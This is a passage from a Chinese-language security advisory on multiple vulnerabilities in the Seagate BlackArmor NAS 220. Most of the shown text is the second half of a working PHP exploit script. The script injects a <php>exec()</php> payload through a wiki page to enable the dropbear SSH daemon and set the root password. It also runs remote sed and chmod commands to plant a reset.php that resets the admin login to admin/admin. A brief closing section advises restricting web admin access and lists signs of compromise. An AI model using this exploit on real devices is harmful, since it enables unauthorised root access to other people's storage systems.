Seagate BlackArmor NAS 220 多个安全漏洞(2)

curl_setopt($ch, CURLOPT_POSTFIELDS, "sectok=" . $sectok .
"&id=playground:playground&do[save]=Save&wikitext=<php>exec(\"/usr/sbin/drop
bear start;\"); exec(\"echo '" . $root_password . "' | passwd
--stdin;\");</php>");

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_AUTOREFERER, 1);

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);

curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");

curl_setopt($ch, CURLOPT_URL, $url . "/wiwiki/doku.php");

curl_exec($ch);

curl_close($ch);

echo "- The devices is rooted! The password is: " .
$root_password ."\n";

echo "- The SSH daemon was also enabled!!\n\n";

} else {

echo "- Can't root the device due to lack of admin
credentials\n";

echo "- However, do you want to reset the admin password? [yes]:";

$handle = fopen ("php://stdin","r");

$line = fgets($handle);

if(trim($line) == "yes") {

$httpResponseCode = RemoteFileExist($argv[1] .
"/backupmgt/immediate_log/instance.log");

if ($httpResponseCode == "200") {

RemoteCodeExec($argv[1], "sed '11,16d'
/proto/SxM_webui/d41d8cd98f00b204e9800998ecf8427e.php >
/proto/SxM_webui/reset.php");

RemoteCodeExec($argv[1], "chmod 755
/proto/SxM_webui/reset.php");

echo "- Now go to: " . $argv[1] . "/reset.php to
reset the default credentials to admin/admin.\n";

exit;

} else {

echo "Something went wrong, the HTTP error code is:
" . $httpResponseCode . "\n";

}

} else {

echo "Exit....\n";

exit;

}

}

} else {

echo "- No passwords were found!\n";

echo "- However, do you want to reset the admin password? [yes]:";

$handle = fopen ("php://stdin","r");

$line = fgets($handle);

if(trim($line) == "yes") {

$httpResponseCode = RemoteFileExist($argv[1] .
"/backupmgt/immediate_log/instance.log");

if ($httpResponseCode == "200") {

RemoteCodeExec($argv[1],
"sed '11,16d' /proto/SxM_webui/d41d8cd98f00b204e9800998ecf8427e.php >
/proto/SxM_webui/reset.php");

RemoteCodeExec($argv[1], "chmod 755
/proto/SxM_webui/reset.php");

echo "- Now go to: " .
$argv[1] . "/reset.php to reset the default credentials to admin/admin.\n";

exit;

} else {

echo "Something went wrong, the HTTP error
code is: " . $httpResponseCode . "\n";

}

} else {

echo "Exit....\n";

exit;

}

}

?>

建议:
--------------------------------------------------------------------------------
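厂商补丁:
本页未给出厂商补丁或固件更新信息。在确认已安装修复版本之前,建议仅允许受信任网络访问设备的 Web 管理界面。排查时可检查 /proto/SxM_webui/ 目录下是否出现 reset.php、wiki 的 playground 页面是否被写入 <php> 内容、dropbear(SSH)是否被意外启用,以及 root 或 admin 口令是否被更改。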
